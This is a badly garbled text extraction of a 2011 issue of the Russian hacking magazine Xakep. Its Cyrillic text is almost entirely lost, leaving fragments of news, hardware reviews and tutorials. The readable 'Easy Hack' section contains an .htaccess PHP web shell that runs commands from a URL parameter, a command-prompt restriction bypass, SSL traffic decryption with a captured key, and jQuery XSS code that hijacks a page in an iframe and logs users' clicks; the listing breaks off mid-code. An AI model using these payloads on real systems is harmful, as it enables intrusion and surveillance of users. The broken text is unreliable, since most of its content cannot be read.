Хакер 2011 08 PDF

x 08 (151) 2011
.
210
:

. 66
08 (151) 2011
PHDAYS
2011
$ 500 000 APPSTORE
$500 000

APPSTORE
. 28
151
Windows 7 Portable:
Dropbox
@Mail.Ru
HD Moore: Metasploit
Generation Carberp
DNS
REBINDING

SAME ORIGIN POLICY
. 56
3 -
: 12 , 6
3 .
, ? ? .
- .
INTRO
,
whitehat-. ,
. : 142 .
,
.
, : ,
- .
. -
,
.
, .
PHD, Chaos
Constructions (27-28 ).
- DEFCON-
DEFCON-Russia.
, IT .
: http://defcon-russia.ru.
,
. ,
,
. , ,
.
nikitozz, . .
vkontakte.ru/xakep_mag
Content
MegaNews
004
Ferrum
016
018
Samsung SyncMaster T27A950

2.0
PC_Zone
024
028
032
033
034
Dropbox
048
052
060
Proof-of-Concept
072
Windows 7 Portable
Easy-Hack

CONFidence 2011
CTF
PHDays
DNS Rebinding
092

GPU
1000
0day

TDL4
- TDL4
Cloud Hacking
X-Tools
Generation Carberp
Win32/TrojanDownloader.Carberp
J2ME-
iptables
102
108
Web-
Kohana + MVC = love
@Mail.Ru
112
mail.ru
SMS- Android
Scripting Layer for Android:
116
SYN/ACK
120
124
130

SCOM:
ERP !
ERP-: , Open Source
SELinux: !
Anti DNS pinning
MALWARE
080
086
074
066
Metasploit
064
HD Moore
AppStore
game-:
Flash iPhone
Capture The Flag
056
082
098
042
Dropbox: - ,
038
PHREAKING
134

Shield- Arduino
140
FAQ UNITED
143
144
WWW2
FAQ
8.5
web-
024
Dropbox
Dropbox: ,

056
DNS Rebinding
Anti DNS pinning
086

GPU
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
(po@kumekay.com)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

>PR-
(grigorieva@glc.ru)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906
> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>
(polikarpova@glc.ru)
>
, birarova@glc.ru
>
( )
(tatarenkova@glc.ru)
>
(ilk@glc.ru)
(goncharova.n@glc.ru)
>
(yakovleva.s@glc.ru)
> -
(alekseeva@glc.ru)
> MAN TV

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .
>

>

.

. ,
,
.

.
.

:
content@glc.ru
, , 2011
>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
ICPC !
. ICPC ,
-- (),
... ,
, . ,
11 .
, , ,
8
.
:
, (8 );
, (7 );
- , (7 );
, (7 );
, (7 ).
,
,
. ,
, ,
, !
Microsoft Security Essentials .

10,66% 43 000 , OPSWAT
. ,
Avira Antivir Personal 10,18%. AVAST!
8,66%.
GEOHOT
GeoHot
Facebook.
Sony : Facebook
...
(Facebook is really an amazing place to work... first hackathon over).
.
,
9- Facebook software engineer. ,
GeoHot
Sony. , ,
.
Facebook , iPad (, ),
. ,
.
004
X 08 /151/ 2011
MEGANEWS
BITTORRENT

BitTorrent. TranzSend Broadcasting Network , BitTorrent Inc Kontiki
Inc 7.301.944
(

) BitTorrent. ,
.

uTorrent, ,
BitTorrent
!
2007
,

1999 , ,

- BitTorrent.
Tranz-Send Broadcasting Network
,

, BitTorrent

,

, P2P- .
,

.
.
?
$8-9 , 60% .
,
.

. .

, , ,
:).

SMS .

GS1. ,

SenseIT, GSM-
SIM-,
,
.

(
-10 50 ),
. ,

GS1 ,
, , /
.
3 000 .
70% Android- -
, Motorola.
, CPU
.
006
X 08 /151/ 2011
MEGANEWS

,
,

.

500 (6,2 )

.
300
(3,7 ) .

,
,
.

DDoS .
,
-

.

,
,
.
303b

( ),

. ,
,
DDoS
.
:
2011 95%.
GOOGLE
Google ,
2009 . Google Voice Search Android, Symbian iOS,
Google Chrome . -, , ,
Chrome, . , ,
,
.
, Google
. Google Images
TinEye. , -
008
( )
-, . ,
. , , ,
Facebook.
Google , (
Google) ,
.
X 08 /151/ 2011
WEXLER.HOME 903

, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.
. WEXLER.HOME
750 . ,
, .
WEXLER.HOME 903 Windows 7 .

64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).
Intel Core i5-650 3,2 - 4 . CPU

Turbo Boost, (, ). , .
GeForce GTX 460,

Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.
WEXLER.HOME 903
4 , .
Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.
MEGANEWS
Intel Labs, ,

.
, -
. Termite
,

, . Termite
. ,
, , .
: ,
. ,
,
.
, , ,
.
NICTA, Open Kernel Labs
SOSP.
:
bit.ly/m3dtvt.
,
Foursquare 10 .

Apple.
-,
Mac OS X
Lion. . Mac App Store
29,99 .
250 , , ,
iOS.
:
- -
010
. Mission Control

Launchpad.

Mac App Store. AirDrop
Mac .
-, Apple iOS 5, . 24 !
iPhone Dev Team.
-
,
. , ,
iOS iPod touch.
Cydia iSSH.
.
-,
. Apple
,
.
iTunes Match.
: scan-and-match
( ) iTunes
,
$25
.
,
iTunes,
CD .
,

, ,
TuneCore.
,
, . ,
, ,

.
X 08 /151/ 2011
MEGANEWS
NOKIA
Nokia,
Microsoft , IM for Nokia.
Nokia X6, Nokia 5230, Nokia N8, Nokia E7,
Series 40
.
Ovi Store. ,
,
Google
Talk, Windows Live Messenger, Yahoo!
Messenger
. ,
, ,
iMessage.

iOS 5 ,
.
ICANN
, .
, .apple, .ibm .

Sony
, ,
. ,

. Sony (
),

Sega Pass .

1,3
- Sega Pass.
, ,
.

,
, ,
email ,
( ).
,
LulzSec,
, Sega
. LulzSec, Bethesda, Nintendo, ,

, ,
Dreamcast . , ,

.
,
NATO E-Bookshop. ,
,
, .
,
E-Bookshop , , , , .

, ,
. ,
XSS.

Fluke Networks. OptiView
XG Network Analysis Tablet

.

. ,
Fluke Networks, ,
,
:
012
.
, ,
10 ,
.
2,5 , 10,25- 1024x738,
,
.
Windows 7, Intel Core Duo 1,2
. OptiView XG 30
000
10 /. ,
,

.
X 08 /151/ 2011
BITCOIN
Bitcoin,
peer-to-peer-.
, ,
- . , Bitcoin
. , .
BC MtGox, .
MtGox ( 60
), MD5. ,
,
( 1000 ). , -
, : MtGox
$17 . , ,
, , . ,

432 BC, $8 6,6%
. ,
. , Bitcoin
. , BC
-2011, , . , ( Infostealer.
Coinbit) Bitcoin, , Bitcoin. ,
, , , .
, ...
Microsoft
Rustock, .
. , -
, Microsoft .
,
( ,
) .

, Microsoft ,
Rustock.
. Microsoft ,
, .
noticeofpleadings.com, .
, ,
. ,
, , :). , ,
Rustock, ( 2006 )
- .
.
Facebook, , .
6 ( 155,2
149,4 ).
SKYPE
Skype
. , Microsoft ( Government
Security Program) , .

(skype-open-source.blogspot.com) (
1.x/3.x/4.x),
( , AES RSA ). X 08 /151/ 2011
,
Skype, , .
, , ,
. , ,
,

Skype . ,
,
-.
013
MEGANEWS
, 3D
, , ,
,
- , 3D. ,
(
), ,
, 3D , .
, , 3D,
, ,
.
. ,
. ,
, ,
,
2D. .
, $5
(
). ,
:
, .
, , ,
,
. 3D
!
,
, 2600.
WEXLER TAB 9701

,
, . Wexler

Android 2.3 WEXLER.TAB 9701.
:
ARM- 1,2 ;
512 ;
9,7 SuperTFT- 1024768
IPS
;
8 -.
, , ,
1080p (FullHD).

(, ,
), mini-HDMI.

USB-. (IEEE 802.11 b/g/n) 3G ( Wideband Code Division Multiple Access).

(G-) GPS-,
A-GPS. , - 7000 9
(
Wi-Fi).

12 , 700 . 2011

13,900 .
, Red Hat ( )
$1 .
QR-
QR-
,
, .
,
.
QR-. ,
, ,
.
5
014
.
, ,
10 .
2011 . QR-
: www.
q5g.nl. , ,
,
33 ,
.
X 08 /151/ 2011
SPYEYE

, ,
. ,
, . security-
Trusteer: , SpyEye
Air Berlin AirPlus.
AirPlus :
,
,
. Air Berlin :
,
.
( ) ,
Trusteer.
Chaos Constructions 2011. 11-

27 28
, -.

, ,

. ,

. . ,

,
, .
,
.
, ,

,
(). , ,
?

?,
.
,
.

,
... ,

.
RSA SECURID
RSA Security 40 SecurID,
, - ,
. EMC ,
, SecurID
Lockheed Martin ( - F-22
F-35), . SecurID , . , , ,
30 60 .
, , . ,
,
.
RSA
, SecurID,
,
,
. RSA
,
, .
SecurID ,
, RSA . SecurID
, ,
.
www.xakep.ru
X 08 /151/ 2011
015
FERRUM

:
: 27"
: 1920x1080
: TFT TN
: 300 /2
: 1000:1
: 3
: , RJ-45, 2x USB 2.0,
2x HDMI, , CAM-,
, headphone
: 6,2
28000 .
!
- - ,
CRT-
- ( ).
, ,
, - .
,
, ,
,
-, .
, ? .
. , , ,
.
,
Samsung SyncMaster T27A950. , .

. , 27 . ,
016
. , .
, , .

. -, , . -, .
, . , .

.
14 ,
27 ,
.
.

. ,
DVI-D,
D-Sub. HDMI, ,
, ,
BD-. ,
X 08 /151/ 2011
-
Samsung SyncMaster T27A950 ,
. , ,
--.
,
,
Samsung SyncMaster
T27A950 -.
, .

USB 2.0. ,
, ,
.
-, -
. , - , Samsung SyncMaster T27A950
. ,
USB 2.0 .
-- Wi-Fi-, ( !)
USB-.
,
RJ-45 . , Samsung SyncMaster T27A950
.

3D. ,
2D
3D (, , ).
.
X 08 /151/ 2011

,
Samsung SyncMaster T27A950 , . ,
.
, , .
,
,
. , .

Datacolor Spyder3Elite, :
, 45 60 .
, .
-
.

sRGB. . sRGB
, ( )
.
.
.
Samsung SyncMaster T27A950 , , ,

.
.
- , ,
, . ,
, ,
, . z
017
FERRUM

2.0
,

.
: ,
..
2.0.

. , ,
. ,
.
-, . ,
,
, ,
, ,
.
-, . , , ,
( ),
. , ,
, .
, , .
, ,
, high-end.
, , , ,
Focal Tools, .
, , ,
-
. ,
, . Armin Van Buuren
Ray Brown ( ,
,
), Jackyl ( ) Diana Krall
(

). , .
.
018
:
DVD- Alpine DVA-9861Ri
+ 2RCA to mini-jack
:
Focal Tools
IASCA Official Sound Quality Reference CD
AMT SQ

:
Creative Gigaworks T40 series II
Edifier C200
Edifier R2000T
JBL Duet III
Microlab H11
Sven Stream Mega

Microlab Solo 15 . ,
Edifier C200.
, ,
, , ,
.
,
.
X 08 /151/ 2011
3900 .
Creative Gigaworks
T40 series II
:
: 2.0
: AUX, - X-30
:
: 216 RMS
/: 80
:
:
: 32518090
Gigaworks T40 series II ,

.
. ,
, .
. , ,
. - Creative Docking Station
X-30 iPod,
. , iPod, ,
AUX-,
.
,
, ,
, .
,
. . ,
.
.
- iPod.
.
.
4670 .
Edifier C200
:
: 2.0
: AUX
:
: 225 RMS
/: 85
:
:
: 320253196 (), 22321872 ()
,
Hi-Fi-, Edifier C200.
-, , , ,
, . -, Edifier C200
LED-,
/ .
, .
, AUX,
, , DVD-,
,
. , ,
Edifier C200 .
.

. ,
, , .
. ,
, . Edifier C200 ( ,
) . ,
200 .
.
, .

.
X 08 /151/ 2011
019
FERRUM
5850 .
3800 .
Edifier R2000T
JBL Duet III
: 2.0
:
:
: 230 RMS
/: 95
:
:
: 320253x196
: 2.0
:
:
: 210 RMS
/: 70
:
:
: 304117117
R2000T ,
,
.
,
.
, , , .
, . , , ,
, .
, 200. 6,5- ,
.
.
R2000T , , ,
.
.
Harman/Kardon
.
-.

( 4 ) .
.
,
.
, . ,
.
.
, . , , ,

. , , ,
, .
.
.
020
, .
.
.
X 08 /151/ 2011
FERRUM
3900 .
Microlab Solo 15
:
: 2.0
:
:
: 240 RMS
/: 80
:
:
: 315238168
,
. ,
. , , ,
: 13-
, .
, , . : , ,
,
.
:
; , ,
; ,
.
, Solo 15
.
,
.
3960 .
Sven Stream
Mega
:
: 2.0
:
:
: 260 RMS
/: /
:
:
: 360255255
Hi-Fi, .
,
mini-jack-
. ,

.
6,5- .
.
,
, . .
Stream Mega .
,
. ,
(,
), .
.
.
.
022
X 08 /151/ 2011
>> coding
PC_ZONE
Step (twitter.com/stepah)
Dropbox
Dropbox:
,
Dropbox 5
. 25 .
,
.
Dropbox . 4
. , ,
, security- (pastebin.
com/yBKwDY6T).
, ,
Dropbox.
,
,
. , SSL-, (AES-256).
,
, , ,
, Dropbox
. .
, -, ,
- .
,
024
, Dropbox. .
EncFS
, wiki (wiki.dropbox.com),
. ,
,
. ,
Dropbox TrueCrypt FreeOTFE
.
: , .
, .
: ,
(, 1 ). ,
Dropbox, . ,
wiki
file-by-file-,
. EncFS, X 08 /151/ 2011

.
EncFS - ( , Dropbox)
.
-
. ,
, EncFS
Dropbox. , Dropbox
. ,
Linux FUSE (Filesystem
in Userspace),
. ,
Mac OS X, Windows. .
Windows
Dropbox
BoxCryptor (www.boxcryptor.com), .
AES-256.

, , Dropbox, ,
.
,
EncFS Windows.
BoxCryptor ,
.
,
Dropbox,
. , ,
.
,
, ,
. Advanced Mode,
BoxCryptor.
, Dropbox .
, BoxCryptor ,
, X 08 /151/ 2011
:
, Dropbox. , .
BoxCryptor
Dropbox, (
X:). Dropbox , . .
BoxCryptor, , (
). .
BoxCryptor encfs6.xml.
EncFS , ,
. , ,
, Dropbox.
, ,
, EncFS Windows encfs4win
(gitorious.org/encfs4win). , , .
, BoxCryptor, Dokan (dokandev.net), FUSE Windows
.
Linux
Linux
EncFS , .
(>= 1.7),
. , , ( 1.6). , ,
Ubuntu 10.10, . . EncFS
GUI- Cryptkeeper:
sudo apt-get install encfs cryptkeeper
Cryptkeeper
Applications System Tools Cryptkeeper
:
025
PC_ZONE
X:
1. Cryptkeeper Import EncFS
folder.
2. ,
( BoxCryptor).
3. ,
.
Cryptkeeper
EncFS: , Cryptkeeper > /home/step/
Documents/Safe. .
GUI-, EncFS- :
encfs ~/Dropbox/BoxCryptor/ ~/BoxCryptor

, .
Mac OS X
EncFS Mac OS X, ,
- .
, .
, EncFS
, \ .
:
1.
EncFS,
. XCode(developer.apple.com). 3- .
2. MacFUSE (code.google.com/p/macfuse), Mac OS X FUSE,
EncFS. MacFUSE.pkg,
.
3. EncFS,
(
Homebrew), :
ruby -e "$(curl -fsSL https://raw.github.com/gist/323731)"
026
SecretSync
4. EncFS
. Homebrew ,
( ):
brew install encfs
5. EncFS !
BoxCryptor ( ~/Dropbox/BoxCryptor)
, (, ~/
Dropbox/BoxCryptor):
encfs ~/Dropbox/BoxCryptor ~/BoxCryptor
GUI- MacFusion
(www.macfusionapp.org)
EncFS (thenakedman.wordpress.com/encfs).
BoxCryptor EncFS, , ,
X 08 /151/ 2011

BoxCryptor . , -
, .
Portable- BoxCryptor,
. ,
,
. . Portable-
BoxCryptor , . ,
, Dropbox
DropboxPortableAHK (dropportable.ho.am).
Dropbox
7
(bit.ly/dropbox_fail) Dropbox. , config.db.
%APPDATA%\Dropbox SQLite.
host_id
. . .
. config.
db ,
. !
, ,
host_id .

-.
19 Dropbox ,
,
.
26 GitHub Dropship
(github.com/driverdan/dropship), ,
Dropbox. , , .

.
github Dropbox.
Dropbox .
EncFS Mac OS X
Dropbox.
( AES-256)
SecretSync (getsecretsync.com/ss).
Windows Linux,
OS X . ,
Java, ,
.
, BoxCryptor :).
. , ,
- ? , ,
, ,
.
Wuala (www.wuala.com),
.
,
Dropbox. Windows, Linux, Mac,
iPhone Android.
Wuala RSA-2048,
AES-128.
. ,
, .
,
. ,
? ... . -,
X 08 /151/ 2011
19
. , . Dropbox
, ,
, 1% .
. :
Wuala,
( , 4
).
, Wuala- ,
, .
, ,
.
1 , , ( ,
Dropbox), .
, Wuala .
, .
Dropbox ,

. , Wuala .
,
, .
Java-. Drobox+BoxCryptor
. , ,
, . z
027
PC_ZONE
Johnny-K (www.johnny-k.ru)
$500 000

APPSTORE
game-:
Flash iPhone

MacBook Pro.
iPhone - Ragdoll Cannon. , Objective-C
, Mac OS .

, 2008
Flash Ragdoll Cannon.
, .
: (
028
, box2d),
, ,
. . , - , casual- .
X 08 /151/ 2011
Ragdoll Cannon.
$600,
$600, $8000.
, ,
,
$25 000 ,
, . Ragdoll Cannon
Flash-, , ,
.

09/2010 ][.
, , ,
. AppStore ,
iPhone/iPod/iPad. ? .
Objective-C, iPhone/iPad, .
cocos2d,
,
iOS.
- . ,
(
) , ,
-.
, AppStore
Ragdoll Blaster.
, , .
Ragdoll Blaster , -
Ragdoll Cannon. , , ,
.
. Apple
, , . .
iOS , -.
,
Flash-. :
, , - FDGEntertainment, AppStore.
Ragdoll Blaster. ,

X 08 /151/ 2011
Physics Gamebox. AppStore

(
).
:)? . Objective-C
, , , - . , ,
,
- .
,
- , .
AppStore
FDG Physics Gamebox.
: Ragdoll Cannon
Roly-Poly Cannon ( Flash-).
. ,
.
,
(Apple 30 , ).
, ,
, .
HTTP://WWW
links
:
www.johnny-k.ru.

cocos2d
iPhone:
habrahabr.ru/blogs/
macosxdev/122383.

iPhone OS. :
habrahabr.ru/blogs/
macosxdev/86597.
,
, .
.
, ,
, .
Flash-
Cover Orange. ? ,
iOS. ,
.
. , .
,
( ) , . ?
, ,

-. ? ! ?
, ! ? ! ,
! , (
),
. Flash- Cover Orange
029
PC_ZONE
+ = Cover Orange
:
100 . : iPhone/
iPad ! . Objective-C
: ,
. , ,
cocos2d. , .
, 80 .
.
iPad ,
( ),
. , Apple iPhone 4
Retina, .
, .
Apple-
.
( ),
, , Apple, ,
3gs 3g.
. 688 .
3 .
Xcode
- :
. ? -
2008 , - , ,
. , , .
, ,
. ,
.
2010 Cover Orange AppStore

iPad, $1,99.
, Top
25 ( ).
.
! iPhone.
99 . .
!
: , ,
, ,
, ,
-. ,
.
, , .
. .

, Apple
. , . 200 ,
030
X 08 /151/ 2011

iPhone,
iPhone. ,
. ,
.
iPod Touch, iPhone, , GSM-.
Mac, Intel. , .
(
, ).
Mac OS X
( MacOS X + VirtualBox = , bit.ly/iTJOec).
, ,
iOS , Mac iPhone/iPad
. -.
. .

iPhone OS
iPhone SDK (developer.apple.com/iphone).
IDE (XCode),
(GCC), (GDB), , iPhone .
XCode IDE, , , Visual Studio,
.
, Apple
, ( ,
AppStore). iPhone
Objective-C.
C C++, .
,
Obj-C. ,
, .
: Java ActionScript 3.
cocos2d.

. , !
, - .
, Objective-C
.
,
. , ,
, , . -
Apple. - ,
, :
,

. . , - .
.
, Cover Orange . -
. -
-, X 08 /151/ 2011
. , , ,
.

,
, . AppStore,
,
. ?
, .
, ,
Apple,
, ( appfigures.com),
. : , , ? ,

Apple, .
. , .
, 99%
. ,
, , .
, .
. 30 50
Apple. , ,
,
. , ,
,
-. Apple, , .
. ,
, ( ).
, . ,
,
. . , .
. .
.
, ,
, .
$0,99. , ,

. .
Mac OS. cocos2d
.
-, .
, .
AppStore Mac OS.
? -.
, ? -
, , .
-? . -
. ,
, iOS! z
031
PC_ZONE
twitter.com/stepah
,
:
. ,
. , ,
( )
.
,

, .
,
IP-. ,
.

IP-

, .
IP- (
/ IP)
, , , .

WIP-Base WIPmania.com.
:
IP-

IP-.
1. IP- (
/ IP).
, ,

WIP-Base WIPmania.com.
IP-.

-, , SQL, CIDR, :
WIP-API ( API );
032
WIP-Plugin (WorldIP- Mozilla

Firefox);
WIP-Map ( IP-
).
: , , , ,
. ,
.
2.
- ,
.
iptables, . ,

,
,
.
geoip xtables-addons iptables,
,
WorldIP- WIPmania
. :
1. xtables-addons (xtablesaddons.sourceforge.net).
2. geoip.

URL static.wipmania.com/static/worldip.
iptables.tar.gz. ,
(,
).
3. .
http-
:
iptables -A INPUT -p tcp --dport 80
-m geoip --src-cc CN -j DROP
WIP-Map
-j ACCEPT
-
(, ,
):
-m geoip --src-cc RU,UA,BY -j ACCEPT
-j DROP

nginx ngx_http_geo_
module, ( bit.ly/jIHTaA). z
X 08 /151/ 2011
PC_ZONE
Proof-of-Concept
-

Google. ,
"index of" + "mp3" -html -htm -php
mp3. .
, (
www.exploit-db.com/google-dorks)
, ,
. ,
. , ,
, ,
. , ,
DigiNinja, Amazon S3.
S3 Simple Storage Server, Amazon. ,
.
( $0,055 ), ($0,01 10 000 ),
( $0,050 ). , .
bucket ( Amazon S3),
. ,
xtoolz/scanner.zip bucket
xakep, , URL http://xakep.
s3.amazonaws.com/xtoolz/scanner.zip.
bucket , .

. , -
Bucket Finder
X 08/151/ 2011
, All.
DigiNinja? S3
bucket, ,
, .
:
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>7F3987394757439B</RequestId>
<HostId>kyMIhkpoWafjruFFairkfim383jtznAnwiyKSTxv7+/
CIHqMBcqrXV2gr+EuALUp</HostId>
</Error>
Public bucket
bucket:
<ListBucketResult xmlns="http://s3.amazonaws.com
/doc/2006-03-01/">
<Name>digipublic</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>my_file</Key>
<LastModified>2011-05-16T10:47:16.000Z</LastModified>
<ETag>"51fff3c9087648822c0a21212907934a"</ETag>
<Size>6429</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
bucket (Access
Denied), .
URL, bucket
(%bucket_name%.s3.amazonaws.com)
URL. , wordlist
bucket ,
.
, , ,
(
).
, : 403 Forbidden (
) 200 OK ( ).
, ,
. DigiNinja Ruby Bucket Finder (www.digininja.
org/projects/bucket_finder.php), .
wordlist
(2226 ) . 848
131 bucket.
9683 , ,
. z
033
PC_ZONE

Windows 7 PORTABLE

Windows 7,
.
,
: ,
, ,
.
, , Live-,
- recovery-. , , , ,
, , (
). .
Linux, UBCD4Win, Windows XP,
,
Barts PE Builder (www.nu2.nu/pebuilder). ,
, , , ,
, : Windows 2000/XP/2003. :
,
Windows 7. .
,
.
WinBuilder ,
:
LiveXP Windows XP
.
Win7PE Windows 7.
VistaPE-CAPI Vista.
NaughtyPE Windows XP -.
MultiPE Vista
Windows 7.
Win7PE, .
WinBuilder
PeBuilder ,
WinBuilder. , Windows PE (
Windows, CD/DVD/
USB-). , Windows Automated Installation
Kit (WAIK)
034
, Windows 7
:
1. Windows 7 x86 x64, SP1.
2. WinBuilder (winbuilder.net).
exe-,
.
X 08 /151/ 2011

3. Windows Automated Installation Kit for Windows 7 (WAIK).
Windows
1,7 ,
Microsoft (bit.ly/poNn7I),
.
4. Driverpack (driverpacks.net/driverpacks/latest)
,
.
,
, Chipset, LAN,
WLAN Mass Storage driver.
,
.
1. Windows Automated
Installation Kit for Windows 7.
ISO, , : KB3AIK_EN.iso StartCD.exe.
Windows AIK
Setup .
, , WinBuilder
, WAIK
( ).
2. Windows 7 ISO - .
3. WinBuilder.exe -
(, C:\WinBuilder) .
:
.
4. WinBuilder
. ,
Download Center.
, .
:
updates.boot-land.net ( );
win7pe.WinBuilder.net/SE ( Win7PE).
(
Recommended).
Complete
, Download.
5. - WinBuilder
,
, .
bcdedit.exe
(Windows 7) C:\WinBuilder \Projects\
Tools\Win7PE_SE\x86 ( C:\WinBuilder \Projects\Tools\
X 08 /151/ 2011
WAIK
Win7PE_SE\x64 64- ).
:
imagex.exe
wimgapi.dll
wimmount.inf
wimmount.sys
wimserv.exe
WAIK. . WinBuilder ,
.
, ,
. .
1. , Win7PE
SE. Source:
Windows 7.
.
2. , .
Drivers.
%GlobalTemplates%\Drivers_x86.
Explore
. Driverpack, .
,
:
.
3. Tweaks,
. , wallpaper, , .
.
4. WriteMedia
Copy to USB-Device,
USB-, .
5. Play ,
. ,
, :
,
DVD
dvd

. ,

Windows 7.
INFO
info
:
Avira AntiVir:
reboot.pro/14817.
Malwarebytes AntiMalware:
reboot.pro/9351.
Salas Password
Renew:
reboot.pro/2720.
035
PC_ZONE
WinBuilder
VMware
( , ). ,
,
WinBuilder. ,
, .
, .
036
, Win7PE_x86.ISO
WinBuilder\ISO.
6. ,
,
. VirtualTest
( , qEmu, VirtualBox, Virtual PC, VMware). (Best Emulation), WinBuilder
VMWare Workstation, .
.
.
7. , . WinBuilder HP USB Disk Storage Format Tool
USB-.
FAT32 (
) NTFS. .
Grub4Dos, . : -,
( ,
), -, Part List
Whole disk (MBR) Dont search floppy.
Install, ,
Gbur4Dos, . : WinBuilder
USB-.
Windows 7 .
X 08 /151/ 2011

1. ,
Windows 7
(SP1). ,
, . ,
, , WinBuilder .
2. - , ,
. - ,
, . Finalize
Save log file . WinBuilder
: , -
.
3. , www.
paraglidernc.com/WinBuilder (
WinBuilder).
. Projects\Paraglider\WinBuilder.chm.
4.
Portable- (, portableapps.
com),
.
USB-, ,
, ,
. :
Windows 7, . Aero
: .
Windows ( regedit),
PENetwork
( ) Opera USB .
, .
()
,
, (
). . \
WinBuilder\Projects\Win7PE_SE\Apps GUI WinBuider. , ,
, ,
- . .
.
, base64.
, (
).
( Total Commander),
.
:
?. , :
Reboot.pros App Scripts (reboot.pro/forum/65);
Al Jos (al-jo.99k.org).
, Wireshark
Winpcap ( : reboot.pro/14842).
Apps/Network,
.
.
, ,
. Tools Create script...,
WinBuilder . , Softperfect Netscan
X 08 /151/ 2011

(www.softperfect.com/products/networkscanner),
:
//
[main]
Title=NetScan
Description=Netscan from Softperfect
Selected=True
Level=5
Version=1
NoWarning=False
Download_Level=0
// ,
[variables]
%ProgramTitle%=Netscan
%ProgramEXE%=netscan.exe
%ProgramFolder%=netscan
//
[process]
// netscan ,
(
)
CopyProgram,%ScriptDir%\%ProgramFolder%
//
Add_Shortcut,StartMenu,Netscan
Add_Shortcut,Desktop,Netscan
// DLL, .
WinBuilder
Require_FileQ,mgmtapi.dll
Require_FileQ,msvcrt.dll
Require_FileQ,KERNEL32.dll
Require_FileQ,snmpapi.dll
Require_FileQ,USER32.dll
Require_FileQ,WS2_32.dll
Require_FileQ,wsnmp32.dll
reboot.pro,
.
, .
- ,
.
Components Additional Files,
. Directory Example,
, , ,
.
? !
, ,
. ,
. , ( , ), .
, , ,
, -. ,
,
? z
037

GreenDog (agrrrdog@gmail.com)
Easy Hack
1
:

.
:
, . .
. ?

. ,
- , ,
. ,
bit.ly/hPFQ4i.

, .
- , .
,
web-, .
Jeremiah Grossman .
( ) Top
Ten Web Hacking Techniques (bit.ly/gmlXLZ). : OWASP BlackHat USA .
,
- , ,
. , .
.
-:
:
.
:
,
. : ,
, ( ) ,
.

. ,
, :).
www.securityaegis.com. , ,
:
1) Start Run gpedit.msc;
2) User Configuration Administrative Templates;
3 )System Prevent access to the command prompt.
, cmd.exe bat-/
038
cmd.exe bat
cmd-. , vbs
. .
Windows XP .
, cmd.exe
command.com. DOS-,
,
X 08 /151/ 2011
. :
command.com , - (ipconfig, ) .
, cd.
, :
cd | ipconfig
- ,
, . : !
:).
: HTTPS
.
:
HTTP
,
Man-in-the-middle.
, , , . HTTPS HTTP, SSL/
TLS-. SSL
. , ,
, .
, HTTPS . ,
.
. , , MiTM. ! , . HTTPS
,
, web-
www.ssllabs.com/ssldb/analyze.html. : , ,
,
. ,
! - , :).
HTTPS :)
: HTTPS-.
:
.
arp-spoofing-
HTTPS- , .
, MiTM
, ,
(, -,
), - :). HTTPS, .
:)... . ,
.
la-la-la.key. ? Wireshark:
1) HTTPS-;
2) Edit Preferences;
X 08 /151/ 2011
HTTPS-
3) Protocols SSL( );
4) RSA key list :
5) IP- , , ,
192.168.0.100,443,SSL,:\la-la-la.key;
6) Apply.
039
:
MS SQL.
:
, ,
/ .
, ,
-. MS SQL
, , . SQL-:
Select @@version
Nmap:
Nmap sV p1433 <targets>
. www.sqlteam.com/article/sql-server-versions
( )
MS SQL
MS. ,
. , , , .
MS SQL
: -
.
:
,
Eldar Marcussen (bit.ly/mm1ynI). - CMS, Apache .htaccess.
, - , -
, .
, .htaccess
- Apache. httpd.conf , , ,
. .htaccess
httpd.conf (
AllowOverride).
, , .htaccess ,
. , .htaccess
, web- ,
- , .
:
:
XSS-.
:
XSS . , XSS- :
stored/ XSS ,
;
reflected/ XSS
,
.
.
, , .
, XSS -
040
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
#### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?> #####
, . , .htaccess .
.htaccess , php-.
php- , ,
'c' c .
: http://victim.com/path/.htaccess?c=command.
. Apache
.htaccess, php . Eldar
Marcussen ,
, .
bit.ly/jBHjNz,
bit.ly/lu9CuD.
, .
,
- : <script>alert(document.cookie); </script>. ,
,
.
- , , . ,
HttpOnly,
/ Cookie JavaScript,
: HTTP. ,
. XSS
, .
, XSS-,
, , ,
X 08 /151/ 2011
.
XSS-tracker: bit.ly/9zZU68. , ,

, -
. ? XSS
. . ? ,
.
iframe, , XSS.
, iframe.
, . ,
. , bit.ly/jETYQx, .
, - ,
, ,
. XSS-tracker
.
jQuery .
:
$('body').children().hide();
$('<iframe>')
.css({ position: 'absolute', width: '100%', height: '100%',
top: 0, left: 0, border: 0, background: '#fff' })
.attr('src', 'http://example.com').appendTo('body');
,
.
$('<iframe>').load(function() {
this.contentWindow; this.contentDocument;
});
.
$('body',this.contentDocument)
.find('a')
.click(function() {
log({event:'click', 'from': location, 'href': this.href,
'target': this.target});
})
.end()
.find('form')
